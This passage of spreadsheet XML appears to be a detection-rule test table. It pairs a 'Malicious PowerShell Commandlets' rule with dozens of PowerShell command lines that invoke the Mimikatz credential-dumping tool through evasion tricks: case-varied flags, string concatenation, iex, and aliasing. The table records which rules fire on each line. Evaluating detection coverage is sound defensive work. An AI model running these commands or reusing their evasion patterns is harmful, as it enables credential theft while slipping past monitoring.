          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1042" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1042" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1042" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1042" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1042" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1042" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1042" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1042" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1043" ht="15.75" customHeight="1" s="42">
      <c r="A1043" s="43" t="n"/>
      <c r="B1043" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1043" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1043" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1043" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMand "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1043" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1043" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1043" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1043" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1043" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1043" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1044" ht="15.75" customHeight="1" s="42">
      <c r="A1044" s="43" t="n"/>
      <c r="B1044" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1044" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1044" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1044" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAND "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1044" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1044" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1044" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1044" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1044" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1044" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1045" ht="15.75" customHeight="1" s="42">
      <c r="A1045" s="43" t="n"/>
      <c r="B1045" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1045" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1045" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1045" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1045" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1045" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1045" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I104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45" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1045" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1046" ht="15.75" customHeight="1" s="42">
      <c r="A1046" s="43" t="n"/>
      <c r="B1046" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1046" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1046" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1046" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1046" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1046" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1046" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I104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46" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1046" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1047" ht="15.75" customHeight="1" s="42">
      <c r="A1047" s="43" t="n"/>
      <c r="B1047" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1047" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1047" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1047" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1047" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1047" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1047" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I104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47" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1047" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1048" ht="15.75" customHeight="1" s="42">
      <c r="A1048" s="43" t="n"/>
      <c r="B1048" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1048" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1048" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1048" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1048" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1048" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1048" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I104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48" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1048" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1049" ht="15.75" customHeight="1" s="42">
      <c r="A1049" s="43" t="n"/>
      <c r="B1049" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1049" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1049" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1049" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1049" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1049" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1049" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1049" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1049" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1049" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1050" ht="15.75" customHeight="1" s="42">
      <c r="A1050" s="43" t="n"/>
      <c r="B1050" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1050" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1050" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1050" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1050" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1050" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1050" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1050" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1050" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1050" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1051" ht="15.75" customHeight="1" s="42">
      <c r="A1051" s="43" t="n"/>
      <c r="B1051" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1051" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1051" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1051" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1051" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1051" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1051" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1051" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1051" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1051" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1052" ht="15.75" customHeight="1" s="42">
      <c r="A1052" s="43" t="n"/>
      <c r="B1052" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1052" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1052" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1052" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmaNd "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1052" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1052" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1052" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1052" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1052" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1052" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1053" ht="15.75" customHeight="1" s="42">
      <c r="A1053" s="43" t="n"/>
      <c r="B1053" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1053" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1053" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1053" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1053" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1053" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1053" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1053" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1053" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1053" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1054" ht="15.75" customHeight="1" s="42">
      <c r="A1054" s="43" t="n"/>
      <c r="B1054" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1054" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1054" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1054" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1054" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1054" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1054" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I105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4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1054" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1055" ht="15.75" customHeight="1" s="42">
      <c r="A1055" s="43" t="n"/>
      <c r="B1055" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1055" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1055" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1055" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1055" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1055" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1055" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I105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5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1055" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1056" ht="15.75" customHeight="1" s="42">
      <c r="A1056" s="43" t="n"/>
      <c r="B1056" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1056" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1056" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1056" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1056" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1056" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1056" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I105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6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1056" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1057" ht="15.75" customHeight="1" s="42">
      <c r="A1057" s="43" t="n"/>
      <c r="B1057" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1057" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1057" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1057" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1057" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1057" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1057" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I105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7" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1057" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1058" ht="15.75" customHeight="1" s="42">
      <c r="A1058" s="43" t="n"/>
      <c r="B1058" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1058" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1058" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1058" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmANd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1058" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1058" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1058" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I10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8" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1058" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1059" ht="15.75" customHeight="1" s="42">
      <c r="A1059" s="43" t="n"/>
      <c r="B1059" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1059" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1059" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1059" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1059" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1059" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1059" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I10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59" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1059" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1060" ht="15.75" customHeight="1" s="42">
      <c r="A1060" s="43" t="n"/>
      <c r="B1060" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1060" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1060" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1060" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1060" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1060" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1060" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I106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0" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1060" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1061" ht="15.75" customHeight="1" s="42">
      <c r="A1061" s="43" t="n"/>
      <c r="B1061" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1061" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1061" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1061" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1061" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1061" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1061" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I106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1" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1061" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1062" ht="15.75" customHeight="1" s="42">
      <c r="A1062" s="43" t="n"/>
      <c r="B1062" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1062" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1062" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1062" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1062" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1062" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1062" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I10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2" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1062" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1063" ht="15.75" customHeight="1" s="42">
      <c r="A1063" s="43" t="n"/>
      <c r="B1063" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1063" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1063" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1063" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1063" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1063" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1063" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I106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3" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1063" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1064" ht="15.75" customHeight="1" s="42">
      <c r="A1064" s="43" t="n"/>
      <c r="B1064" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1064" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1064" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1064" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnD "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1064" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1064" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1064" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I10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4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1064" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1065" ht="15.75" customHeight="1" s="42">
      <c r="A1065" s="43" t="n"/>
      <c r="B1065" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1065" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1065" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1065" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMand "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1065" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1065" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1065" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I10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5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1065" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1066" ht="15.75" customHeight="1" s="42">
      <c r="A1066" s="43" t="n"/>
      <c r="B1066" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1066" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1066" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1066" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1066" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1066" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1066" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I106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6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1066" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1067" ht="15.75" customHeight="1" s="42">
      <c r="A1067" s="43" t="n"/>
      <c r="B1067" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1067" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1067" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1067" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMANd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1067" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1067" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1067" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I106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7" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1067" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1068" ht="15.75" customHeight="1" s="42">
      <c r="A1068" s="43" t="n"/>
      <c r="B1068" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1068" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1068" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1068" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1068" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1068" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1068" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I106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8" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1068" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1069" ht="15.75" customHeight="1" s="42">
      <c r="A1069" s="43" t="n"/>
      <c r="B1069" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1069" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1069" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1069" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1069" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1069" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1069" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I106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69" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1069" s="36" t="b">
        <v>0</v>
      </c>
    </row>
